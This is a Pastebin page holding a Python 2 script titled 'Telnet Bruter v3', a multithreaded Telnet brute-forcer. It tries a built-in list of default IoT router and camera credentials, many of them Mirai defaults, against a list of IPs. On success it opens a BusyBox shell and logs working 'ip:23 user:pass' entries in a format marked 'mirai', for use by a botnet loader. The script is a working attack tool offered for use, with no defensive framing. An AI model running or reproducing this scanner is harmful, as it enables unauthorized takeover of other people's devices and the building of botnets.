API tools faq
paste
Advertisement
uzycie

Telnet Bruter v3 edited

uzycie
Apr 26th, 2017
2,240
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.84 KB | None | 0 0
raw download clone embed print report
  1. import threading
  2. import sys, os, re, time, socket
  3. from Queue import *
  4. from sys import stdout
  5.  
  6. if len(sys.argv) < 4:
  7.     print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
  8.     sys.exit()
  9.  
  10. ips = open(sys.argv[1], "r").readlines()
  11. threads = int(sys.argv[2])
  12. output_file = sys.argv[3]
  13. queue = Queue()
  14. queue_count = 0
  15.  
  16. combo = [ #use as many passwords as ya want(P.S. The more passwords the slower the bruteforce is going to be)
  17.     "root:xc3511",
  18.     "root:vizxv",
  19.     "root:admin",
  20.     "admin:admin",
  21.     "root:888888",
  22.     "root:xmhdipc",
  23.     "root:default",
  24.     "root:juantech",
  25.     "root:123456",
  26.     "root:54321",
  27.     "support:support",
  28.     "root: ",
  29.     "admin:password",
  30.     "root:root",
  31.     "root:12345",
  32.     "user:user",
  33.     "admin:",
  34.     "root:pass",
  35.     "admin:admin1234",
  36.     "root:1111",
  37.     "admin:smcadmin",
  38.     "admin:1111",
  39.     "root:666666",
  40.     "root:password",
  41.     "root:1234",
  42.     "root:klv123",
  43.     "Administrator:admin",
  44.     "service:service",
  45.     "supervisor:supervisor",
  46.     "guest:guest",
  47.     "guest:12345",
  48.     "guest:12345",
  49.     "admin1:password",
  50.     "administrator:1234",
  51.     "666666:666666",
  52.     "888888:888888",
  53.     "ubnt:ubnt",
  54.     "root:klv1234",
  55.     "root:Zte521",
  56.     "root:hi3518",
  57.     "root:jvbzd",
  58.     "root:anko",
  59.     "root:zlxx.",
  60.     "root:7ujMko0vizxv",
  61.     "root:7ujMko0admin",
  62.     "root:system",
  63.     "root:ikwb",
  64.     "root:dreambox",
  65.     "root:user",
  66.     "root:realtek",
  67.     "root:00000000",
  68.     "admin:1111111",
  69.     "admin:1234",
  70.     "admin:12345",
  71.     "admin:54321",
  72.     "admin:123456",
  73.     "admin:7ujMko0admin",
  74.     "admin:1234",
  75.     "admin:pass",
  76.     "admin:meinsm",
  77.     "tech:tech"
  78. ]
  79.  
  80. for ip in ips:
  81.     queue_count += 1
  82.     stdout.write("\r[%d] Added to queue" % queue_count)
  83.     stdout.flush()
  84.     queue.put(ip)
  85. print "\n"
  86.  
  87. class router(threading.Thread):
  88.     def __init__ (self, ip):
  89.         threading.Thread.__init__(self)
  90.         self.ip = str(ip).rstrip('\n')
  91.     def run(self):
  92.         username = ""
  93.         password = ""
  94.         for passwd in combo:
  95.             if ":n/a" in passwd:
  96.                 password=""
  97.             else:
  98.                 password=passwd.split(":")[1]
  99.             if "n/a:" in passwd:
  100.                 username=""
  101.             else:
  102.                 username=passwd.split(":")[0]
  103.             try:
  104.                 tn = socket.socket()
  105.                 tn.settimeout(8)
  106.                 tn.connect((self.ip,23))
  107.             except Exception:
  108.                 tn.close()
  109.                 break
  110.             try:
  111.                 hoho = ''
  112.                 hoho += readUntil(tn, "ogin:")
  113.                 if "ogin" in hoho:
  114.                     tn.send(username + "\n")
  115.                     time.sleep(2)
  116.             except Exception:
  117.                 tn.close()
  118.             try:
  119.                 hoho = ''
  120.                 hoho += readUntil(tn, "assword:")
  121.                 if "assword" in hoho:
  122.                     tn.send(password + "\n")
  123.                     time.sleep(2)
  124.                 else:
  125.                     pass
  126.             except Exception:
  127.                 tn.close()
  128.             try:
  129.                 prompt = ''
  130.                 prompt += tn.recv(40960)
  131.                 if ">" in prompt and "ONT" not in prompt:
  132.                     try:
  133.                         tn.send("cat | sh" + "\n")
  134.                         time.sleep(1)
  135.                         success = False
  136.                         timeout = 8
  137.                         data = ["BusyBox", "Built-in"]
  138.                         tn.send("sh" + "\n")
  139.                         time.sleep(1)
  140.                         tn.send("busybox" + "\r\n")
  141.                         buf = '' # NO FALSE POSSITIVES OVA HERE
  142.                         start_time = time.time()
  143.                         while time.time() - start_time < timeout:
  144.                             buf += tn.recv(40960)
  145.                             time.sleep(1)
  146.                             for info in data:
  147.                                 if info in buf and "unrecognized" not in buf:
  148.                                     success = True
  149.                                     break
  150.                     except:
  151.                         pass
  152.                 elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
  153.                     try:
  154.                         success = False
  155.                         timeout = 8
  156.                         data = ["BusyBox", "Built-in"]
  157.                         tn.send("sh" + "\n")
  158.                         time.sleep(0.01)
  159.                         tn.send("shell" + "\n")
  160.                         time.sleep(0.01)
  161.                         tn.send("help" + "\n")
  162.                         time.sleep(0.01)
  163.                         tn.send("busybox" + "\r\n")
  164.                         buf = '' # NO FALSE POSSITIVES OVA HERE
  165.                         start_time = time.time()
  166.                         while time.time() - start_time < timeout:
  167.                             buf += tn.recv(40960)
  168.                             time.sleep(0.01)
  169.                             for info in data:
  170.                                 if info in buf and "unrecognized" not in buf:
  171.                                     success = True
  172.                                     break
  173.                     except:
  174.                         pass
  175.                 else:
  176.                     tn.close()
  177.                 if success == True:
  178.                     try:
  179.                         #os.system("echo "+self.ip+" >> "+output_file+"") #1.1.1.1 # bios.txt
  180.                         #os.system("echo "+self.ip+":"+username+":"+password+" >> "+output_file+"")    # 1.1.1.1:user:pass # regular
  181.                         os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
  182.                         print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
  183.                         tn.close()
  184.                         break
  185.                     except:
  186.                         tn.close()
  187.                 tn.close()
  188.             except Exception:
  189.                 tn.close()
  190.  
  191. def readUntil(tn, string, timeout=8):
  192.     buf = ''
  193.     start_time = time.time()
  194.     while time.time() - start_time < timeout:
  195.         buf += tn.recv(1024)
  196.         time.sleep(0.01)
  197.         if string in buf: return buf
  198.     raise Exception('TIMEOUT!')
  199.  
  200. def worker():
  201.     try:
  202.         while True:
  203.             try:
  204.                 IP = queue.get()
  205.                 thread = router(IP)
  206.                 thread.start()
  207.                 queue.task_done()
  208.                 time.sleep(0.2)
  209.             except:
  210.                 pass
  211.     except:
  212.         pass
  213.  
  214. for l in xrange(threads):
  215.     try:
  216.         t = threading.Thread(target=worker)
  217.         t.start()
  218.         time.sleep(0.01)
  219.     except:
  220.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!